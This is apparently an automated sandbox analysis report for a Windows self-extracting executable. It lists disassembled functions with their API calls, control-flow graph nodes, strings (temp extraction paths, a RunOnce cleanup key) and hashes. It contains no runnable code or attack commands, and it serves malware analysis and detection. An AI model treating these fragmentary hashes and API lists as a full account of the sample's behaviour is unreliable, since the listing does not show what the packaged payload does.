                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                          • API String ID: 3010855178-2712585282
                                                          • Opcode ID: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                          • Instruction ID: 4185fcc51e4a96271564da0c91dcbb31f41c584e445783b1714163fc66efa779
                                                          • Opcode Fuzzy Hash: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                          • Instruction Fuzzy Hash: 14713B60E0C68386FBF89B21E8402B966E4FF947F8F4040B6D94EC22A5DF3DE445C660
                                                          Function 00007FF6975A64E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 597 7ff6975a64e4-7ff6975a6510 598 7ff6975a65df-7ff6975a65ee 597->598 599 7ff6975a6516-7ff6975a651b call 7ff6975a63b8 597->599 601 7ff6975a65f1-7ff6975a65fb 598->601 602 7ff6975a6520-7ff6975a6522 599->602 603 7ff6975a6610-7ff6975a661b 601->603 604 7ff6975a65fd-7ff6975a6603 601->604 605 7ff6975a6688-7ff6975a668a 602->605 606 7ff6975a6528-7ff6975a653e 602->606 608 7ff6975a661e-7ff6975a6628 call 7ff6975a6b70 603->608 604->603 607 7ff6975a6605-7ff6975a660e 604->607 610 7ff6975a6698-7ff6975a66bc call 7ff6975a8470 605->610 609 7ff6975a6541-7ff6975a654b 606->609 607->601 607->603 617 7ff6975a6649-7ff6975a664b 608->617 618 7ff6975a662a-7ff6975a663d CreateDirectoryA 608->618 613 7ff6975a6560-7ff6975a6575 609->613 614 7ff6975a654d-7ff6975a6553 609->614 620 7ff6975a6577-7ff6975a658f GetSystemInfo 613->620 621 7ff6975a65cc-7ff6975a65dd call 7ff6975a7ba8 613->621 614->613 619 7ff6975a6555-7ff6975a655e 614->619 624 7ff6975a664d-7ff6975a6655 call 7ff6975a6ca4 617->624 625 7ff6975a668c-7ff6975a6693 617->625 622 7ff6975a663f 618->622 623 7ff6975a667d-7ff6975a6682 call 7ff6975a7700 618->623 619->609 619->613 627 7ff6975a6591-7ff6975a6594 620->627 628 7ff6975a65bb 620->628 621->608 622->617 623->605 636 7ff6975a665a-7ff6975a665c 624->636 625->610 633 7ff6975a65b2-7ff6975a65b9 627->633 634 7ff6975a6596-7ff6975a6599 627->634 629 7ff6975a65c2-7ff6975a65c7 call 7ff6975a7ba8 628->629 629->621 633->629 638 7ff6975a65a9-7ff6975a65b0 634->638 639 7ff6975a659b-7ff6975a659e 634->639 636->625 641 7ff6975a665e-7ff6975a6664 636->641 638->629 639->621 640 7ff6975a65a0-7ff6975a65a7 639->640 640->629 641->605 642 7ff6975a6666-7ff6975a667b RemoveDirectoryA 641->642 642->605
                                                          APIs
                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6975A2CE1), ref: 00007FF6975A657C
                                                          • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6975A2CE1), ref: 00007FF6975A662F
                                                          • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6975A2CE1), ref: 00007FF6975A666F
                                                            • Part of subcall function 00007FF6975A63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF6975A2CE1), ref: 00007FF6975A6423
                                                            • Part of subcall function 00007FF6975A63B8: GetFileAttributesA.KERNELBASE ref: 00007FF6975A6432
                                                            • Part of subcall function 00007FF6975A63B8: GetTempFileNameA.KERNEL32 ref: 00007FF6975A645B
                                                            • Part of subcall function 00007FF6975A63B8: DeleteFileA.KERNEL32 ref: 00007FF6975A6473
                                                            • Part of subcall function 00007FF6975A63B8: CreateDirectoryA.KERNEL32 ref: 00007FF6975A6484
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                          • API String ID: 1979080616-1143122538
                                                          • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                          • Instruction ID: 4becc9f399a028f6c8583d98defa57b24f496e064b0c5eb266c6f74a1b73530a
                                                          • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                          • Instruction Fuzzy Hash: 86517F61E09782C5FFF99B25A8102B967A4EF497E0F9841B5C94EC3699DF7CE805C220
                                                          Function 00007FF6975A2C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloadershutdownCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                          • String ID: @$HeapSetInformation$Kernel32.dll
                                                          • API String ID: 1302179841-1204263913
                                                          • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                          • Instruction ID: 22a6f63cfe755e48e68a19422e3d317cf1f893315ad4c3f21aa82a31909c7261
                                                          • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                          • Instruction Fuzzy Hash: DA315E72E0874286FBFC9B20A55227A76A0FF997E0F4441B5CA0DC229ACF7CE441C660
                                                          Function 00007FF6975A204C Relevance: 12.1, APIs: 8, Instructions: 119filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                          • String ID:
                                                          • API String ID: 836429354-0
                                                          • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                          • Instruction ID: 4a74b8d5c10da7e42999673362640258231c8dda2d39638897fc483733585c72
                                                          • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                          • Instruction Fuzzy Hash: F0519431B08B8586EF658F20D9402F87BA1FB85BE4F8481B1DA4D87698DF3CD509C360
                                                          Function 00007FF6975A3910 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 119threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                          • String ID: $52352352352
                                                          • API String ID: 2654313074-2326657022
                                                          • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                          • Instruction ID: 72c55d6ad2a7b3624c64a2795091306fda8e9d46cad2a5d748253d20c8de6215
                                                          • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                          • Instruction Fuzzy Hash: 99514F31E0874286EBB88B11E9442797BA1FB89BF5F5492B1DA1E87798CF3C9445C720
                                                          Function 00007FF6975A61EC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                          • API String ID: 3049360512-2186971993
                                                          • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                          • Instruction ID: 444249026f4d5b3f28d5a84fe990c9ccbcd64f4d4f7e3bf977269a8b18fb67f6
                                                          • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                          • Instruction Fuzzy Hash: 16513031A08A82C6EFA98B14E8543B97BA0FF957E4F4441B5CA4E87694DF3DE448C720
                                                          Function 00007FF6975A473C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115processsynchronizationwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 3183975587-3916222277
                                                          • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                          • Instruction ID: 370fa9c84a84c8e6aa3038241eed25f195a568def752958e99d6f53cd354f24f
                                                          • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                          • Instruction Fuzzy Hash: 215161329087828AF7F89B54F45437AB7A0FB887E5F044175D64D866A8CF7CD844CB20
                                                          Function 00007FF6975A2318 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: OpenQuery$CloseInfoValue
                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                          • API String ID: 2209512893-559176071
                                                          • Opcode ID: 9f23079a79aaf393f30d7d52ead263bb4ecc079f7f4d037dad90965ff67e785b
                                                          • Instruction ID: cfe85f7e59451902a1de849117f1dea386da0f02b8553b332a4b41344fea24ce
                                                          • Opcode Fuzzy Hash: 9f23079a79aaf393f30d7d52ead263bb4ecc079f7f4d037dad90965ff67e785b
                                                          • Instruction Fuzzy Hash: 03318132B08B41CBD7A48F25F8416A9B7A4FB897A4F844575EB8D83B58DF38D054CB50
                                                          Function 00007FF6975A63B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                          • String ID: IXP$IXP%03d.TMP
                                                          • API String ID: 1082909758-3932986939
                                                          • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                          • Instruction ID: e07ea5e00140c40ac5bb82d8eb8f1cc2a9567b63357bbe1075449f226dd3837a
                                                          • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                          • Instruction Fuzzy Hash: AD216171A0894186EB689B12A9903F97791FF8DBE0F858170DD4E87795CF3CD445C610
                                                          Function 00007FF6975A8200 Relevance: 12.1, APIs: 8, Instructions: 136sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                          • String ID:
                                                          • API String ID: 2995914023-0
                                                          • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                          • Instruction ID: f32be0e518e7b98fcbdc5a93ca3e5f17e3ac0cfaefbfee0a5fa473731c3f7ced
                                                          • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                          • Instruction Fuzzy Hash: 1A510531E08A4686EBB98B61E85037926A4FF447E4F9400B5DA4EC72A5DF3DF845C728
                                                          Function 00007FF6975A60A4 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5078
                                                            • Part of subcall function 00007FF6975A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5089
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50AF
                                                            • Part of subcall function 00007FF6975A5050: LoadResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50C0
                                                            • Part of subcall function 00007FF6975A5050: LockResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50CF
                                                            • Part of subcall function 00007FF6975A5050: memcpy_s.MSVCRT ref: 00007FF6975A50EE
                                                            • Part of subcall function 00007FF6975A5050: FreeResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50FD
                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6975A3123), ref: 00007FF6975A60C9
                                                          • LocalFree.KERNEL32 ref: 00007FF6975A6142
                                                            • Part of subcall function 00007FF6975A4DCC: LoadStringA.USER32 ref: 00007FF6975A4E60
                                                            • Part of subcall function 00007FF6975A4DCC: MessageBoxA.USER32 ref: 00007FF6975A4EA0
                                                            • Part of subcall function 00007FF6975A7700: GetLastError.KERNEL32 ref: 00007FF6975A7704
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                          • String ID: $<None>$UPROMPT
                                                          • API String ID: 957408736-2569542085
                                                          • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                          • Instruction ID: f7fab13b29cb76ff3ad5d5411d6ebb306ecd65b7dc1c4f5aaf1e15426630d201
                                                          • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                          • Instruction Fuzzy Hash: 74319471A08642C7FBF85B20E55077A7A61FF897E4F008175CA0E86695DF7DD4048B60
                                                          Function 00007FF6975A5380 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CreateFile$lstrcmp
                                                          • String ID: *MEMCAB
                                                          • API String ID: 1301100335-3211172518
                                                          • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                          • Instruction ID: 1dd7f8a1033911bc301edcede989ceb4c0a9f86b959ffe6130d477178bf9c0a7
                                                          • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                          • Instruction Fuzzy Hash: BE61B5A2E0874286FBB88F15A4807797A91FB49BF4F5453B5DA6E827C0DF7CE4058620
                                                          Function 00007FF6975A58B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: FileTime$AttributesDateLocalTextWindow
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 1150793416-388467436
                                                          • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                          • Instruction ID: bc459da13d2f0d4774d6ea195ca1544ccec6f4de21ec9906ea104000d0bf1c9e
                                                          • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                          • Instruction Fuzzy Hash: 595193B2A18A4385FBF89B11D4409BD27A0FB48BF0F5441B1EA4EC7296DE3CE545C360
                                                          Function 00007FF6975A4C68 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Window$CapsDeviceRect$Release
                                                          • String ID:
                                                          • API String ID: 2212493051-0
                                                          • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                          • Instruction ID: b7ac07c075faf712f558efa7940aeb57eb25c334e0a504270446c090d291d378
                                                          • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                          • Instruction Fuzzy Hash: 3B318232B149518EE7A48B75E8045BD7FB0F749BA9F545170CE0A97B48CF3DE4458B10
                                                          Function 00007FF6975A6B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: AllocLocal
                                                          • String ID: TMP4351$.TMP
                                                          • API String ID: 3494564517-2619824408
                                                          • Opcode ID: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                          • Instruction ID: 4c1cd9970bbe70aac245eff5f1c246ab9ea53091dc094b5a346819a1cb7753c0
                                                          • Opcode Fuzzy Hash: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                          • Instruction Fuzzy Hash: BA31B171A0875587FBA89B24A41037ABA90FB85BF4F444374DA6E87BD5CF3CD8058710
                                                          Function 00007FF6975A7AC8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                          • String ID:
                                                          • API String ID: 1214682469-0
                                                          • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                          • Instruction ID: 2930f86eaacc43f4072e577ec0cab23151cda24f9685c346b40e326c74914d7c
                                                          • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                          • Instruction Fuzzy Hash: CD115171A08B4586EAA48B11F44026ABBA0FB99FF0F484774DE9D47BE8DF3CD4408B14
                                                          Function 00007FF6975A5690 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                          Download Yara Rule
                                                          APIs
